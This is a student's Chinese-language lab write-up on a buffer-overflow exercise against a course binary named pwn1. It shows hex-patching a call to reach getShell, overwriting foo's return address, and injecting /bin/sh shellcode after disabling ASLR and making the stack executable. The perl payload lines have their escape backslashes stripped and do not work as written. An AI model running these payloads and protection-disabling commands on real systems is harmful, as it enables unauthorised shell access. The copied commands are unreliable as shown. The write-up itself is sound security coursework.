一、实践目标
- 1.本次实践的对象是一个名为pwn1的linux可执行文件。
- 2.该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
- 3.该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将
学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。
二、实践内容
- 1.手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
- 2.利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
- 3.注入一个自己制作的shellcode并运行这段shellcode。
三、基础知识
熟悉Linux基本操作
1.管道( | ):用于数据注入文件
管道是一种最基本的IPC机制,作用于有血缘关系的进程之间,完成数据传递。
由两个文件描述符引用,一个表示读端,一个表示写端。
规定数据从管道的写端流入管道,从读端流出。
2.输入、输出重定向( > >> < )
>:以覆盖的方式将命令的正确输出输出到指定的文件或设备当中。
>>:以追加方式重定向到文件设备中。
<:把文件作为命令的输入,例如wc命令时统计行,单词书和字符的。
掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
1.NOP(NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。)
2.JNE:75(条件转移指令,如果不相等则跳转。)
3.JE:74(条件转移指令,如果相等则跳转。)
4.CMP:38~3D(比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。)
相关指令、参数
1.反汇编指令
objdump -d <file(s)>: 将代码段反汇编;
objdump -S <file(s)>: 将代码段反汇编的同时,将反汇编代码与源代码交替显示,编译时需要使用-g参数,即需要调试信息;
objdump -l <file(s)>: 反汇编代码中插入文件名和行号
2.十六进制编程器:
vim
:%!xxd 切换显示模式(16进制模式、ASCII码模式)
3.gdb的常用命令
break(b):设置断点
run(r):运行程序
clear:清除断点
info:显示断点信息
attach:继续执行程序
四、实践步骤
任务一
手工修改可执行文件,改变程序执行流程
实践步骤
-
1.通过命令
objdump -d pwn1 | more对目标文件进行反汇编,找到getshell和foo
-
2.call 8048491 "是汇编指令
是说这条指令将调用位于地址8048491处的foo函数;其对应机器指令为“e8 d7ffffff”,e8即跳转之意。
本来正常流程,此时此刻EIP的值应该是下条指令的地址,即80484ba,但如一解释e8这条指令呢,CPU就会转而执行 “EIP + d7ffffff”这个位置的指令。“d7ffffff”是补码,表示-41,41=0x29,80484ba +d7ffffff= 80484ba-0x29正好是8048491这个值,main函数调用foo,对应机器指令为“ e8 d7ffffff”,那我们想让它调用getShell,只要修改“d7ffffff”为,"getShell-80484ba"对应的补码就行。
用Windows计算器,直接 47d-4ba就能得到补码,是c3ffffff。
下面我们就修改可执行文件,将其中的call指令的目标地址由d7ffffff变为c3ffffff。
-
3.输入命令
vi pwn1,然后执行
按ESC键
输入如下,将显示模式切换为16进制模式:%!xxd
查找要修改的内容即e8d7
找到后前后的内容和反汇编的对比下,确认是地方是正确的,修改d7为c3
转换16进制为原格式:%!xxd -r
存盘退出vi:wq
任务二
通过构造输入参数,造成BOF攻击,改变程序执行流
实践步骤
- 将pwn1 文件通过备用文件还原
cp pwn1.bak pwn1 - 通过反汇编指令观察foo函数为其输入留了多少空间,通过图示可以计算实现缓冲区溢出的字符数为28+4=32 个字节,因此需要将getShell函数的地址放在返回地址即需要33~36字节。(如下是输入11111111222222233333334444444455555555的测试)
- 把33~36四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell,getShell的内存地址,通过反汇编时可以看到,即0804847d。
- 构造输入
11111111222222223333333344444444x7dx84x04x08,由于我们没法通过键盘输入x7dx84x04x08这样的16进制值,所以先生成包括这样字符串的一个文件。x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。
perl -e 'print "11111111222222223333333344444444x7dx84x04x08x0a"' > input - 可以使用16进制查看指令xxd查看input文件的内容是否如预期
- 然后将input的输入,通过管道符“|”,作为pwn1的输入
任务三
注入Shellcode并执行
实践步骤
-
准备一段Shellcode
shellcode就是一段机器指令(code)
通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),
所以这段机器指令被称为shellcode。
在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。 -
修改些设置。
execstack -s pwn1//设置堆栈可执行
execstack -q pwn1//查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space
echo "0" > /proc/sys/kernel/randomize_va_space//关闭地址随机化
more /proc/sys/kernel/randomize_va_space
-
构造要注入的payload。
结构为:anything+retaddr+nops+shellcode。 -
构造命令
perl -e 'print "A" x 32;print "x4x3x2x1x90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x00xd3xffxffx00"' > input_shellcode上面最后的x4x3x2x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。
特别提醒:最后一个字符千万不能是x0a。不然下面的操作就做不了了。
-
原终端a运行
(cat input_shellcode;cat) | ./pwn3,另起一个终端b进行gdb调试,disassemble foo进行反编译,可以看到ret指令的地址为0x080484ae,在此处设置断点break *0x080484ae
-
在a终端中按下回车运行,程序执行到断点停止,再在b终端输入c继续运行程序,然后输入
info r esp查看esp寄存器地址
可以观察到0x01020304的地址为0xffffd32c,因此shellcode注入位置(可以使最先出现0x90的位置)地址为0xffffd32c+0x00000004=0xffffd330
-
重新定义 input_shellcode
perl -e 'print "A" x 32;print"x30xd3xffxffx90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x00xd3xffxffx00"' > input_shellcode
输入命令(cat input_shellcode;cat) | ./pwn3验证结果是否成功
四、实践总结
- 什么是漏洞?漏洞有什么危害?
答:漏洞即为系统或者程序中存在的缺陷,漏洞可以用来进行未授权访问用户或者对用户系统进行破坏。 - 实验感想
由于本次实验有老师提供的视频和资料参考,所以实验思路比较清晰,任务一和任务二很快就做完了,但是在做任务三时,由于自己粗心,把注入地址0xffffd32c+0x00000004误算为0xffffd33d(正确结果为0xffffd330),导致自己频繁出错(如下)
在经过仔细检查后,发现并改正后得以完成。本次实践过程比较简单,根据视频很快就能做完,但是其中的很多原理不是很理解,我觉得只有多次实践后才能理解的更加透彻明白。 - 实验中遇到的问题1:在普通用户中输入su 欲进入管理员权限时,出现如下错误
经过查询,输入sudo su即可
